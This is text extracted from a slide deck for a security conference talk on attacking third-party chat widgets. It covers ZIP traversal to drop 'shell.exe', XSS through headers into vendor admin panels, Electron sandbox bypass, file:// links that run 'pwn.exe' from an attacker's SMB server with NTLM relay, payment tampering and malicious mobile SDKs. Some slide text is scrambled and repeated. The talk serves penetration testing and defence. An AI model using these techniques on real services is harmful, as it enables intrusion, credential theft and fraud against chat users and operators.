Professional Documents
Culture Documents
ZN Chats PDF
ZN Chats PDF
2
Agenda
Chats-Chats-Chats
How does it works?
ZIP old tricks
RCE via ZIP
So much XSS
Electron vulnerability
Scheme file:// for your chats
Payment through chats
Mobile Application Chats
3
Disclaimer
4
Chats-Chats-Chats
What are you talking about?
Another chat?
5
Chats-Chats-Chats
What are you talking about?
Another chat?
7
Chat Types
Browsers CMS
Desktop Application
Mobile SDK
Social Networks
8
Does it help us? Pentest!
Increase attack surface
Social engineering attacks
Vulnerability of own implementations
Vendors vulnerability
User support is on the local network
Lack of segmentation (network)
9
Chat for browsers. How does it works?
JavaScript
CMS = JS
10
JavaScript Privileges
XML HTTP Request
Control of user data
Cookie
Tokens
Sensitive information
HTML replace
Remote update
11
Services
12
Services
12
Services
12
Files
Social engineering attacks?
Will you send an EXE files?
We can use a couple of stupid tricks
with ZIP
13
ZIP Bomb
Hi @sergeybelove
42 Kb from 2014 :)
24 Gb?
322 Gb?
132 Tb?
4.5 Pb
14
ZIP Format
15
ZIP Traversal
16
Lets send a file
api.servise.test
storage.servise.test
17
Lets send a file
api.servise.test
Sen
storage.servise.test
di n
gt
he
file
cat.png
17
Lets send a file
api.servise.test
Sen
storage.servise.test
di n
gt
he
file
cat.png
cat.png == id
17
Lets send a file
api.servise.test
Sen
storage.servise.test
di n
gt
he
file
cat.png
cat.png == id
17
Lets send a file
api.servise.test
Sen
storage.servise.test
di n
gt
he
file
cat.png
cat.png == id
17
Lets send a file
api.servise.test
Sen
storage.servise.test
di n
gt
he
file
Concat(https://storage.service.test', file_path);
cat.png
cat.png == id
17
Lets send a file
api.servise.test
Sen
storage.servise.test
di n file
gt d
he n loa
file w
Do Concat(https://storage.service.test', file_path);
GET /file/id HTTP/1.1
Host: storage.service.test
cat.png
cat.png == id
17
Lets send a file
api.servise.test
Sen
storage.servise.test
di n file
gt d
he n loa
file w
Do Concat(https://storage.service.test', file_path);
GET /file/id HTTP/1.1
Host: storage.service.test
cat.png
cat.png == id
17
RCE via File
api.servise.test
18
RCE via File
api.servise.test
Sen
di n
gt
he
file
cat.png
18
RCE via File
api.servise.test
Sen
di n
gt
he
file
cat.png
18
RCE via File
api.servise.test
sa ge Fil
eM Operator standalone program
M es = d .h fil e
User interface h
File _pat file/
i ack e_p ssag
er. ath e
file .site/ tes
k er t/f =
a c ile
.h /id
Sen
di n
gt
he
file
cat.png
18
RCE via File
api.servise.test
sa ge Fil
eM Operator standalone program
M es = d .h fil e
User interface h
File _pat file/
i ack e_p ssag
er. ath e
file .site/ tes
k er t/f =
a c ile
.h /id
Sen
di n
gt
he
file
Concat(https://storage.service.test', file_path);
cat.png
18
RCE via File
api.servise.test
sa ge Fil
eM Operator standalone program
M es = d .h fil e
User interface h
File _pat file/
i ack e_p ssag
er. ath e
file .site/ tes
k er t/f =
a c ile
.h /id
storage.servise.test.hacke.site
Sen
di n
gt
he
file
Concat(https://storage.service.test', file_path);
cat.png
18
RCE via File
api.servise.test
sa ge Fil
eM Operator standalone program
M es = d .h fil e
User interface h
File _pat file/
i ack e_p ssag
er. ath e
file .site/ tes
k er t/f =
a c ile
.h /id
storage.servise.test.hacke.site
Sen
di n
gt
he
file
Concat(https://storage.service.test', file_path);
cat.png ../../../../../../../shell.exe == id
18
RCE via File
api.servise.test
sa ge Fil
eM Operator standalone program
M es = d .h fil e
User interface h
File _pat file/
i ack e_p ssag
er. ath e
file .site/ tes
k er t/f =
a c ile
.h /id
storage.servise.test.hacke.site
Sen
di n
gt d file
he l oa
file wn
Do Concat(https://storage.service.test', file_path);
GET /file/id HTTP/1.1
Host: storage.service.test.hacke.site
cat.png ../../../../../../../shell.exe == id
18
RCE via File
api.servise.test
sa ge Fil
eM Operator standalone program
M es = d .h fil e
User interface h
File _pat file/
i ack e_p ssag %Downloads%/shell.exe
er. ath e
file .site/ tes
k er t/f =
a c ile
.h /id
storage.servise.test.hacke.site
Sen
di n
gt d file
he l oa
file wn
Do Concat(https://storage.service.test', file_path);
GET /file/id HTTP/1.1
Host: storage.service.test.hacke.site
cat.png ../../../../../../../shell.exe == id
18
XSS
XSS is the maximum impact
High level of message security
Not obvious places
Headers
GET/POST parameters for analytics
Our target is Admin page or statistic page
19
Headers for XSS
User-Agent
Referrer
Cookie
Origin
Custom Headers
20
Parameters for XSS
Methods
GET
POST
WebSocket
22
The sad consequences
XSS into chat settings
Appearance customisation
Fonts
Labels
Color
Image
etc
23
Attack scheme 1
Evil Hacker pentest_client.shop.test
24
Attack scheme 1
Evil Hacker pentest_client.shop.test
24
Attack scheme 1
statistic_vendor.chat.test
Evil Hacker pentest_client.shop.test admin_vendor.chat.test
24
Attack scheme 1
statistic_vendor.chat.test
Evil Hacker pentest_client.shop.test admin_vendor.chat.test
XSS attack on
XSS attack on chat client admins
24
Attack scheme 1
statistic_vendor.chat.test
Evil Hacker pentest_client.shop.test admin_vendor.chat.test
XSS attack on
XSS attack on chat client admins
24
Attack scheme 1
statistic_vendor.chat.test
Evil Hacker pentest_client.shop.test admin_vendor.chat.test
XSS attack on
XSS attack on chat client admins
JS code injection
into chat settings
24
Attack scheme 1
statistic_vendor.chat.test
Evil Hacker pentest_client.shop.test admin_vendor.chat.test
XSS attack on
XSS attack on chat client admins
JS code injection
into chat settings
24
Attack scheme 1
statistic_vendor.chat.test
Evil Hacker pentest_client.shop.test admin_vendor.chat.test
XSS attack on
XSS attack on chat client admins
JS code injection
into chat settings
pentest_client.shop.test
XSS from any
user on the site
24
Attack scheme 2
chat.vendor statistic.chat.vendor
Evil Hacker admin.chat.vendor
25
Attack scheme 2
chat.vendor statistic.chat.vendor
Evil Hacker admin.chat.vendor
25
Attack scheme 2
chat.vendor statistic.chat.vendor
Evil Hacker admin.chat.vendor
XSS attack on
XSS attack on chat vendor admins
25
Attack scheme 2
chat.vendor statistic.chat.vendor
Evil Hacker admin.chat.vendor
XSS attack on
XSS attack on chat vendor admins
25
Attack scheme 2
chat.vendor statistic.chat.vendor
Evil Hacker admin.chat.vendor
XSS attack on
XSS attack on chat vendor admins
JS code injection
into chat settings
25
Attack scheme 2
chat.vendor statistic.chat.vendor
Evil Hacker admin.chat.vendor
XSS attack on
XSS attack on chat vendor admins
JS code injection
into chat settings
XSS from any
user on the site
25
Attack scheme 2
chat.vendor statistic.chat.vendor
Evil Hacker admin.chat.vendor
XSS attack on
XSS attack on chat vendor admins
JS code injection
into chat settings
chat.vendor
XSS from any
user on the site
25
Attack scheme 2
chat.vendor statistic.chat.vendor
Evil Hacker admin.chat.vendor
XSS attack on
XSS attack on chat vendor admins
JS code injection
into chat settings
chat.vendor
XSS from any
XSS from any user on the site
user on
chat clients
25
Attack scheme 2
chat.vendor statistic.chat.vendor
Evil Hacker admin.chat.vendor
XSS attack on
XSS attack on chat vendor admins
JS code injection
into chat settings
chat.vendor
statistic_vendor.chat.test XSS from any
XSS from any
admin_vendor.chat.test user on the site
user on
chat.test chat clients
All chat clients services
25
Electron
OpenSource framework to build desktop
apps using HTML, CSS and JavaScript
Electron accomplishes this by combining
Chromium and Node.js into a single
runtime
Chats vendor use Electron for admin
desktop applications
26
Electron Threat Model
Electron Threat Model = Browser Threat Model
Untrusted content from the web
SOP Bypass
Control whether access to Node.js primitives is allowed from
JavaScript
Potential access to Node.js primitives
Limited sandbox
XSS == RCE
https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf
https://blog.doyensec.com/2017/08/03/electron-framework-security.html
27
Electron sandbox bypass
nodeIntegration = true
Electron 1.6.7
28
Electron sandbox bypass
nodeIntegration = true
Misconfiguration
SOP bypass via presence of privileged URLs
Switch false
29
File://
Typically used to retrieve files from networks and local disks
Vulnerability in the wild
Local File Inclusion
XXE
SSRF
Windows context
NTLM Hash Stealing
NTLM Relay
RCE
30
Chats with File://
31
Chats with File://
Pentest in local network
RCE on client device and servers
Weakness & duplicate passwords (local services, servers, client
devices)
file://hacker.test/
SMB Relay
32
Tricks with File:// 1
What can we do?
File:// with local files
file://C:/Windows/System32/calc.exe
But we cant use arguments
file://C:/Windows/System32/cmd.exe /C calc
All symbols in file link is a path
It is only for social engineering attacks
You can combine this with dir traversal ZIP trick
33
Tricks with File:// 2
File:// with execute files from the Internet (Hacker SMB server)
file://internet_IP/pwn.exe
34
Chats with File://
Pentest internet service and local network
RCE on client device Admin OS
Social engineering attacks + file://local_files
36
Tricks with File:// 3
Local network from OS Windows is servers with NetBios name
NetBios name - Domain names without dot
If Ill use NetBios name netbios instead of local IP, I can bypass
that alert
file://netbios/pwn.exe
How?
Smbd (samba) server + responder d netbios I eth0
37
Chats with File://
NetBios name trick in local network
Without alert window Admin OS
39
Hacker can buy IPhone for free
Shop backend
40
Hacker can buy IPhone for free
Shop backend
POST /pay?params=1
shopId
customer
sum
item
40
Hacker can buy IPhone for free
Shop backend
POST /pay?params=1
shopId
customer
Redirect to payment page
sum
item
40
Hacker can buy IPhone for free
Shop backend
40
Hacker can buy IPhone for free
Shop backend
40
Hacker can buy IPhone for free
Shop backend
40
Stealing money for hackers
Protection:
Check Yandex Ips
Add anti-CSRF token for config form
DO NOT SHOW ANY PASSWORDS EVER
41
Mobile Application SDK
Custom code for native applications
All code have only one privileges in Mobile OS
3rd party applications have full access in your app
Change theuserinterface
Access to local files in folder app
Access to dynamic user data
Change logic app (like tapjacking)
Vulnerability
Custom implementation
WebView JS manipulation (Android)
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
42
ExpensiveWall
ExpensiveWall is spread to different apps as an SDK called
gtk,
ExpensiveWall sends data about the infected device to its C&C
server, including its location and unique identifiers, such as
MAC and IP addresses, IMSI, and IMEI.
Total Downloads infected applications = 5,904,511
https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/
43
Dont forget about
Farms that overestimate the rating of applications
Dynamic code execution and code update
JSPatch iOS
Android Runtime
Valid Ad that were vulnerable
Application with fake (Ad) SDK
Code review custom SDK code
44
Conclusion
For pentest and red team
Increase your attack surface via 3rd party services and program library
For you and your project
Think how much you trust other peoples implementations,
applications in your devices, plugins in your program
Dont forget about code review!
45
Questions? Or
Special THX to @cherboff and @barracud4_
@ShikariSenpai @_p4lex
Alexey Pertsev
Egor Karbutov